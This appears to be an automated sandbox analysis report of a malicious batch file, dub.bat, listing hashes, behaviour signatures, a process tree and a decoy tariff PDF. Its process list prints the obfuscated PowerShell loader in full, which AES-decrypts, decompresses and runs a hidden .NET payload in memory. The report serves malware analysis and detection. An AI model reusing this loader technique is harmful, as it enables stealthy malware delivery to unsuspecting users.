Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
08-02-2023 03:50
Static task
static1
Behavioral task
behavioral1
Sample
dub.bat
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
dub.bat
Resource
win10-20220901-en
General
-
Target
dub.bat
-
Size
226KB
-
MD5
cf81b345541f19ab200b4d0de4a64962
-
SHA1
56dcdd340cb470fcd42c0cd1531d1eac8fcd7980
-
SHA256
07a0759d5b376fc57f2ad9c5a32d59829934828b862591225c43421044ffd4ec
-
SHA512
ac960f497fc3354831a76c1a385e95c65b66d862bd09e24b73bedb8e969d8221516e8d7a6eba257c5613c61d82d16305fd672a5112d441b97e5fefa0d88a7e97
-
SSDEEP
6144:LiEz3MvivRRFAFNmR3QaqnMadPo7lNhkLPUoV:mivRRFsNmwulNeLcoV
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
dub.bat.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation dub.bat.exe -
Executes dropped EXE 1 IoCs
Processes:
dub.bat.exepid process 2660 dub.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
Processes:
dub.bat.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings dub.bat.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
dub.bat.exeAcroRd32.exepid process 2660 dub.bat.exe 2660 dub.bat.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
dub.bat.exedescription pid process Token: SeDebugPrivilege 2660 dub.bat.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AcroRd32.exepid process 4824 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
AcroRd32.exepid process 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe 4824 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exedub.bat.exeAcroRd32.exeRdrCEF.exedescription pid process target process PID 964 wrote to memory of 2660 964 cmd.exe dub.bat.exe PID 964 wrote to memory of 2660 964 cmd.exe dub.bat.exe PID 2660 wrote to memory of 4824 2660 dub.bat.exe AcroRd32.exe PID 2660 wrote to memory of 4824 2660 dub.bat.exe AcroRd32.exe PID 2660 wrote to memory of 4824 2660 dub.bat.exe AcroRd32.exe PID 4824 wrote to memory of 4344 4824 AcroRd32.exe RdrCEF.exe PID 4824 wrote to memory of 4344 4824 AcroRd32.exe RdrCEF.exe PID 4824 wrote to memory of 4344 4824 AcroRd32.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 3492 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 4880 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 4880 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 4880 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 4880 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 4880 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 4880 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 4880 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 4880 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 4880 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 4880 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 4880 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 4880 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 4880 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 4880 4344 RdrCEF.exe RdrCEF.exe PID 4344 wrote to memory of 4880 4344 RdrCEF.exe RdrCEF.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dub.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\dub.bat.exe"dub.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $utCHT = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\dub.bat').Split([Environment]::NewLine);foreach ($sWAOq in $utCHT) { if ($sWAOq.StartsWith(':: ')) { $upQKs = $sWAOq.Substring(3); break; }; };$JjLmi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($upQKs);$YkqlI = New-Object System.Security.Cryptography.AesManaged;$YkqlI.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YkqlI.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YkqlI.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kiFQHKEXvznY0Nsnm3fp94kgb604e6Feq9TQN777Yxs=');$YkqlI.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5Ca2LFqXHi3HVlKnNoz3+g==');$vFmBU = $YkqlI.CreateDecryptor();$JjLmi = $vFmBU.TransformFinalBlock($JjLmi, 0, $JjLmi.Length);$vFmBU.Dispose();$YkqlI.Dispose();$fuUUI = New-Object System.IO.MemoryStream(, $JjLmi);$gvEAD = New-Object System.IO.MemoryStream;$wMQDT = New-Object System.IO.Compression.GZipStream($fuUUI, [IO.Compression.CompressionMode]::Decompress);$wMQDT.CopyTo($gvEAD);$wMQDT.Dispose();$fuUUI.Dispose();$gvEAD.Dispose();$JjLmi = $gvEAD.ToArray();$vodVl = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($JjLmi);$UBeHH = $vodVl.EntryPoint;$UBeHH.Invoke($null, (, [string[]] ('')))2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\international_tariff_consumer.pdf"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0D5C2E8456D11B87B7259BE2CD8DD6AA --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=6BC7FF1122681FC1E47430731F4CECAF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=6BC7FF1122681FC1E47430731F4CECAF --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:15⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=77F28B364B1D4DF417F5115F8B3B977E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=77F28B364B1D4DF417F5115F8B3B977E --renderer-client-id=4 --mojo-platform-channel-handle=2188 --allow-no-sandbox-job /prefetch:15⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FE225CFDA142A00BAB27BA716FDD0939 --mojo-platform-channel-handle=2572 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7643A7BA676F9F4D2354CF3D8BB749E1 --mojo-platform-channel-handle=1808 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=150611A030E1EB59485B96C1D7AECA6F --mojo-platform-channel-handle=2608 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\dub.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Local\Temp\dub.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Local\Temp\international_tariff_consumer.pdfFilesize
144KB
MD5c11925db0aeee6ed50d287441b8e1cec
SHA138e8070658872826d9afdd17df1e73475f62a286
SHA256ff75f9d0cad2ad4e55221d749a5ec0347d7b02df2da8c473d76ea1ba7aaeadb6
SHA5129178f928fb370abcf3deb39fd7bd9e5edfc01f8424dd27cf6f0f030261b037b310aed46e651302ca0f9e3e91f692f3d49d0403db9d201388941760eec596c059
-
memory/2660-134-0x000001CC90040000-0x000001CC90062000-memory.dmpFilesize
136KB
-
memory/2660-136-0x00007FF9E7FD0000-0x00007FF9E8A91000-memory.dmpFilesize
10.8MB
-
memory/2660-132-0x0000000000000000-mapping.dmp
-
memory/2660-162-0x00007FF9E7FD0000-0x00007FF9E8A91000-memory.dmpFilesize
10.8MB
-
memory/2684-149-0x0000000000000000-mapping.dmp
-
memory/3304-157-0x0000000000000000-mapping.dmp
-
memory/3492-141-0x0000000000000000-mapping.dmp
-
memory/4344-139-0x0000000000000000-mapping.dmp
-
memory/4436-160-0x0000000000000000-mapping.dmp
-
memory/4592-154-0x0000000000000000-mapping.dmp
-
memory/4824-137-0x0000000000000000-mapping.dmp
-
memory/4880-144-0x0000000000000000-mapping.dmp